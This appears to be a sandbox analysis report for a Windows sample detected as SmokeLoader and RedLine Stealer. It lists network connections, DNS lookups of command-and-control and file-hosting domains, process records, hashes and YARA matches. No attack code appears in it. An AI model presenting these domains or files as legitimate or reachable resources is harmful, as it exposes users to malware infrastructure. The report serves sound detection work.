Nov 19, 2022 16:57:50.656058073 CET	80	49694	173.222.108.226	192.168.2.3
Nov 19, 2022 16:57:50.656167030 CET	49694	80	192.168.2.3	173.222.108.226
Nov 19, 2022 16:57:50.664350986 CET	80	49693	93.184.220.29	192.168.2.3
Nov 19, 2022 16:57:50.664375067 CET	80	49696	93.184.221.240	192.168.2.3
Nov 19, 2022 16:57:50.664437056 CET	49693	80	192.168.2.3	93.184.220.29
Nov 19, 2022 16:57:50.664479017 CET	49696	80	192.168.2.3	93.184.221.240
Nov 19, 2022 16:57:50.668303967 CET	80	49692	8.248.147.254	192.168.2.3
Nov 19, 2022 16:57:50.668392897 CET	49692	80	192.168.2.3	8.248.147.254
Nov 19, 2022 16:57:50.678309917 CET	80	49695	8.248.147.254	192.168.2.3
Nov 19, 2022 16:57:50.678441048 CET	49695	80	192.168.2.3	8.248.147.254
Nov 19, 2022 16:58:01.455888987 CET	49700	80	192.168.2.3	77.232.37.228
Nov 19, 2022 16:58:01.522022009 CET	80	49700	77.232.37.228	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 19, 2022 16:58:01.160134077 CET	192.168.2.3	8.8.8.8	0x612	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:01.919708014 CET	192.168.2.3	8.8.8.8	0x2dc1	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:02.407712936 CET	192.168.2.3	8.8.8.8	0x831b	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:02.568012953 CET	192.168.2.3	8.8.8.8	0x7f71	Standard query (0)	srshf.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:03.491904974 CET	192.168.2.3	8.8.8.8	0xe145	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:03.984349966 CET	192.168.2.3	8.8.8.8	0xd0c3	Standard query (0)	iplogger.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:04.147842884 CET	192.168.2.3	8.8.8.8	0xe423	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:04.567305088 CET	192.168.2.3	8.8.8.8	0x1d8c	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:04.728820086 CET	192.168.2.3	8.8.8.8	0xf26c	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:04.891732931 CET	192.168.2.3	8.8.8.8	0xcd2	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:05.062556028 CET	192.168.2.3	8.8.8.8	0xd03b	Standard query (0)	1ecosolution.it	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:13.176884890 CET	192.168.2.3	8.8.8.8	0x82cc	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:13.590037107 CET	192.168.2.3	8.8.8.8	0x2b18	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:13.755465031 CET	192.168.2.3	8.8.8.8	0x5033	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:14.192063093 CET	192.168.2.3	8.8.8.8	0x5938	Standard query (0)	cdn-102.anonfiles.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:17.774099112 CET	192.168.2.3	8.8.8.8	0xc05a	Standard query (0)	anonfiles.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:17.997459888 CET	192.168.2.3	8.8.8.8	0x3a04	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:18.159235954 CET	192.168.2.3	8.8.8.8	0xb498	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:19.462356091 CET	192.168.2.3	8.8.8.8	0x34f8	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:19.622137070 CET	192.168.2.3	8.8.8.8	0x9f0e	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:19.784775019 CET	192.168.2.3	8.8.8.8	0xe54f	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:19.948282003 CET	192.168.2.3	8.8.8.8	0x6473	Standard query (0)	transfer.sh	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:23.004631996 CET	192.168.2.3	8.8.8.8	0xbe99	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:23.176175117 CET	192.168.2.3	8.8.8.8	0xced9	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:23.339287043 CET	192.168.2.3	8.8.8.8	0x1631	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:23.508014917 CET	192.168.2.3	8.8.8.8	0xbf2c	Standard query (0)	hoteldostyk.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:32.394125938 CET	192.168.2.3	8.8.8.8	0xdc9f	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:32.553194046 CET	192.168.2.3	8.8.8.8	0x2f4f	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:32.742621899 CET	192.168.2.3	8.8.8.8	0x19a9	Standard query (0)	transfer.sh	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:34.758660078 CET	192.168.2.3	8.8.8.8	0x353c	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:34.962809086 CET	192.168.2.3	8.8.8.8	0x6752	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:35.193367004 CET	192.168.2.3	8.8.8.8	0xa1ec	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:35.406321049 CET	192.168.2.3	8.8.8.8	0x9818	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:35.570811033 CET	192.168.2.3	8.8.8.8	0xfa0f	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:35.680458069 CET	192.168.2.3	8.8.8.8	0x26c7	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:36.569705963 CET	192.168.2.3	8.8.8.8	0x7fe0	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:36.733948946 CET	192.168.2.3	8.8.8.8	0x5716	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:36.897253990 CET	192.168.2.3	8.8.8.8	0x8ea9	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:37.078887939 CET	192.168.2.3	8.8.8.8	0x2e50	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:37.255276918 CET	192.168.2.3	8.8.8.8	0xe432	Standard query (0)	bitbucket.org	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:37.858977079 CET	192.168.2.3	8.8.8.8	0xbcb5	Standard query (0)	bbuseruploads.s3.amazonaws.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:40.124414921 CET	192.168.2.3	8.8.8.8	0xaca	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:45.903089046 CET	192.168.2.3	8.8.8.8	0x71c3	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:59:12.424742937 CET	192.168.2.3	8.8.8.8	0x1728	Standard query (0)	2w3ke1f81kujb1erhj396kfejh2wgw.kgpoaj9k4sgjd4aitghsrtuxhq	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:59:31.145158052 CET	192.168.2.3	8.8.8.8	0x6676	Standard query (0)	www.youtube.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:59:46.107234955 CET	192.168.2.3	8.8.8.8	0x3551	Standard query (0)	lentaphoto.at	A (IP address)	IN (0x0001)	false
Nov 19, 2022 17:01:06.986499071 CET	192.168.2.3	8.8.8.8	0x127d	Standard query (0)	iujdhsndjfks.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 19, 2022 16:58:01.452234030 CET	8.8.8.8	192.168.2.3	0x612	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:02.261224031 CET	8.8.8.8	192.168.2.3	0x2dc1	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:02.427973986 CET	8.8.8.8	192.168.2.3	0x831b	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:02.741633892 CET	8.8.8.8	192.168.2.3	0x7f71	No error (0)	srshf.com		108.167.141.212	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:03.841243029 CET	8.8.8.8	192.168.2.3	0xe145	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:04.001168013 CET	8.8.8.8	192.168.2.3	0xd0c3	No error (0)	iplogger.com		148.251.234.93	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:04.424365997 CET	8.8.8.8	192.168.2.3	0xe423	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:04.584631920 CET	8.8.8.8	192.168.2.3	0x1d8c	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:04.746968031 CET	8.8.8.8	192.168.2.3	0xf26c	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:04.911199093 CET	8.8.8.8	192.168.2.3	0xcd2	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:05.103020906 CET	8.8.8.8	192.168.2.3	0xd03b	No error (0)	1ecosolution.it		46.252.148.24	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:13.446790934 CET	8.8.8.8	192.168.2.3	0x82cc	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:13.607109070 CET	8.8.8.8	192.168.2.3	0x2b18	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:14.050710917 CET	8.8.8.8	192.168.2.3	0x5033	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:14.606645107 CET	8.8.8.8	192.168.2.3	0x5938	No error (0)	cdn-102.anonfiles.com		195.96.151.51	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:17.792520046 CET	8.8.8.8	192.168.2.3	0xc05a	No error (0)	anonfiles.com		45.154.253.151	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:17.792520046 CET	8.8.8.8	192.168.2.3	0xc05a	No error (0)	anonfiles.com		45.154.253.150	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:17.792520046 CET	8.8.8.8	192.168.2.3	0xc05a	No error (0)	anonfiles.com		45.154.253.152	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:18.014646053 CET	8.8.8.8	192.168.2.3	0x3a04	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:18.192998886 CET	8.8.8.8	192.168.2.3	0xb498	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:19.481662035 CET	8.8.8.8	192.168.2.3	0x34f8	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:19.641381025 CET	8.8.8.8	192.168.2.3	0x9f0e	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:19.803828001 CET	8.8.8.8	192.168.2.3	0xe54f	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:19.966825008 CET	8.8.8.8	192.168.2.3	0x6473	No error (0)	transfer.sh		144.76.136.153	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:23.021636963 CET	8.8.8.8	192.168.2.3	0xbe99	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:23.193491936 CET	8.8.8.8	192.168.2.3	0xced9	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:23.358150005 CET	8.8.8.8	192.168.2.3	0x1631	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:23.749830961 CET	8.8.8.8	192.168.2.3	0xbf2c	No error (0)	hoteldostyk.com		43.231.112.109	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:32.411025047 CET	8.8.8.8	192.168.2.3	0xdc9f	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:32.572393894 CET	8.8.8.8	192.168.2.3	0x2f4f	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:32.761758089 CET	8.8.8.8	192.168.2.3	0x19a9	No error (0)	transfer.sh		144.76.136.153	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:34.777826071 CET	8.8.8.8	192.168.2.3	0x353c	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:34.982450008 CET	8.8.8.8	192.168.2.3	0x6752	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:35.212619066 CET	8.8.8.8	192.168.2.3	0xa1ec	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:35.423413038 CET	8.8.8.8	192.168.2.3	0x9818	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:35.594837904 CET	8.8.8.8	192.168.2.3	0xfa0f	No error (0)	github.com		140.82.121.4	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:35.700153112 CET	8.8.8.8	192.168.2.3	0x26c7	No error (0)	raw.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:35.700153112 CET	8.8.8.8	192.168.2.3	0x26c7	No error (0)	raw.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:35.700153112 CET	8.8.8.8	192.168.2.3	0x26c7	No error (0)	raw.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:35.700153112 CET	8.8.8.8	192.168.2.3	0x26c7	No error (0)	raw.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:36.588682890 CET	8.8.8.8	192.168.2.3	0x7fe0	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:36.752307892 CET	8.8.8.8	192.168.2.3	0x5716	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:36.915503025 CET	8.8.8.8	192.168.2.3	0x8ea9	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:37.099838018 CET	8.8.8.8	192.168.2.3	0x2e50	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:37.275063992 CET	8.8.8.8	192.168.2.3	0xe432	No error (0)	bitbucket.org		104.192.141.1	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:37.876419067 CET	8.8.8.8	192.168.2.3	0xbcb5	No error (0)	bbuseruploads.s3.amazonaws.com	s3-1-w.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 19, 2022 16:58:37.876419067 CET	8.8.8.8	192.168.2.3	0xbcb5	No error (0)	s3-1-w.amazonaws.com	s3-w.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 19, 2022 16:58:37.876419067 CET	8.8.8.8	192.168.2.3	0xbcb5	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.21.195	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:37.876419067 CET	8.8.8.8	192.168.2.3	0xbcb5	No error (0)	s3-w.us-east-1.amazonaws.com		52.216.177.187	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:37.876419067 CET	8.8.8.8	192.168.2.3	0xbcb5	No error (0)	s3-w.us-east-1.amazonaws.com		52.216.92.75	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:37.876419067 CET	8.8.8.8	192.168.2.3	0xbcb5	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.99.44	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:37.876419067 CET	8.8.8.8	192.168.2.3	0xbcb5	No error (0)	s3-w.us-east-1.amazonaws.com		52.216.220.65	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:37.876419067 CET	8.8.8.8	192.168.2.3	0xbcb5	No error (0)	s3-w.us-east-1.amazonaws.com		52.216.25.68	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:37.876419067 CET	8.8.8.8	192.168.2.3	0xbcb5	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.174.25	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:37.876419067 CET	8.8.8.8	192.168.2.3	0xbcb5	No error (0)	s3-w.us-east-1.amazonaws.com		52.216.35.241	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:40.144412041 CET	8.8.8.8	192.168.2.3	0xaca	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:58:45.921497107 CET	8.8.8.8	192.168.2.3	0x71c3	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:59:12.443828106 CET	8.8.8.8	192.168.2.3	0x1728	Name error (3)	2w3ke1f81kujb1erhj396kfejh2wgw.kgpoaj9k4sgjd4aitghsrtuxhq	none	none	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:59:31.164213896 CET	8.8.8.8	192.168.2.3	0x6676	No error (0)	www.youtube.com	youtube-ui.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 19, 2022 16:59:31.164213896 CET	8.8.8.8	192.168.2.3	0x6676	No error (0)	youtube-ui.l.google.com		216.58.215.238	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:59:31.164213896 CET	8.8.8.8	192.168.2.3	0x6676	No error (0)	youtube-ui.l.google.com		172.217.168.14	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:59:31.164213896 CET	8.8.8.8	192.168.2.3	0x6676	No error (0)	youtube-ui.l.google.com		172.217.168.46	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:59:31.164213896 CET	8.8.8.8	192.168.2.3	0x6676	No error (0)	youtube-ui.l.google.com		142.250.203.110	A (IP address)	IN (0x0001)	false
Nov 19, 2022 16:59:46.472574949 CET	8.8.8.8	192.168.2.3	0x3551	Server failure (2)	lentaphoto.at	none	none	A (IP address)	IN (0x0001)	false
Nov 19, 2022 17:01:07.054994106 CET	8.8.8.8	192.168.2.3	0x127d	No error (0)	iujdhsndjfks.ru		134.0.118.203	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

fs.microsoft.com

https:

www.bing.com

srshf.com

iplogger.com

cdn-102.anonfiles.com

anonfiles.com

transfer.sh

hoteldostyk.com

github.com

raw.githubusercontent.com

bitbucket.org

bbuseruploads.s3.amazonaws.com

t.me

www.youtube.com

watson.telemetry.microsoft.com

ijksciexii.com

o36fafs3sn6xou.com

bpbdsdk.net

umixvvejem.com

qqfarpecak.com

oorjfnwj.net

awjddgg.com

vewejolrw.net

ttvgdova.com

ujapeckwwf.net

llobgypg.org

bqrca.net

vovqsb.net

xqiywpnnx.com

193.56.146.168

hebuwvwfs.net

kjwivofpbv.net

uflscskn.org

wnamt.org

pbxlqwo.com

hpnwth.net

uilamexewu.net

xqqjug.org

eewqpkgoat.org

ipmxouwmp.com

pccxxtjnt.com

dygmllr.com

mwcxqjbc.com

pmgurxcfse.com

anhnwnhtgc.net

xqculhri.net

lruucyh.com

193.56.146.174

116.202.5.101

65.21.213.208:3000

iujdhsndjfks.ru

Target ID:	0
Start time:	16:57:03
Start date:	19/11/2022
Path:	C:\Users\user\Desktop\q4Z52wRd28.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\q4Z52wRd28.exe
Imagebase:	0x400000
File size:	346112 bytes
MD5 hash:	A687E1C326C9F03569BBFEF53E21C315
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000003.256917988.0000000000970000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.340457364.0000000000960000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.340559376.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.340559376.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.340166873.0000000000871000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.340651575.0000000000C11000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.340651575.0000000000C11000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low

Analysis Process: explorer.exePID: 3452, Parent PID: 5708

General

Target ID:	1
Start time:	16:57:13
Start date:	19/11/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff69fe90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000000.327872359.0000000003851000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000000.327872359.0000000003851000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high

Analysis Process: cttgcewPID: 4220, Parent PID: 1080

General

Target ID:	11
Start time:	16:58:02
Start date:	19/11/2022
Path:	C:\Users\user\AppData\Roaming\cttgcew
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\cttgcew
Imagebase:	0x400000
File size:	346112 bytes
MD5 hash:	A687E1C326C9F03569BBFEF53E21C315
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.393943988.00000000025E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000B.00000002.393943988.00000000025E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.393477736.0000000000880000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000B.00000002.393477736.0000000000880000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000003.381680800.0000000000870000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000B.00000002.393611577.00000000008D1000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000B.00000002.393447143.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 27%, ReversingLabs
Reputation:	low

Analysis Process: A852.exePID: 6000, Parent PID: 3452

General

Target ID:	12
Start time:	16:58:19
Start date:	19/11/2022
Path:	C:\Users\user\AppData\Local\Temp\A852.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\A852.exe
Imagebase:	0x400000
File size:	385536 bytes
MD5 hash:	0E455D9C65E7D53A67C227DCD8D70FB8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000C.00000002.424634553.0000000000891000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000C.00000002.428145666.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: B4A7.exePID: 3080, Parent PID: 3452

General

Target ID:	13
Start time:	16:58:22
Start date:	19/11/2022
Path:	C:\Users\user\AppData\Local\Temp\B4A7.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\B4A7.exe
Imagebase:	0x400000
File size:	1235912 bytes
MD5 hash:	F96144B1D5B53D93CAADDDADE38DB5E9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000003.542369400.000000000070F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000003.527908931.000000000D290000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000D.00000003.527908931.000000000D290000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000D.00000003.501276183.00000000024E6000.00000040.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000003.533006922.000000000D292000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000003.541178072.0000000000701000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000002.562231967.0000000000714000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 21%, ReversingLabs
Reputation:	low

Analysis Process: rovwer.exePID: 4852, Parent PID: 6000

General

Target ID:	14
Start time:	16:58:24
Start date:	19/11/2022
Path:	C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe"
Imagebase:	0x400000
File size:	385536 bytes
MD5 hash:	0E455D9C65E7D53A67C227DCD8D70FB8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
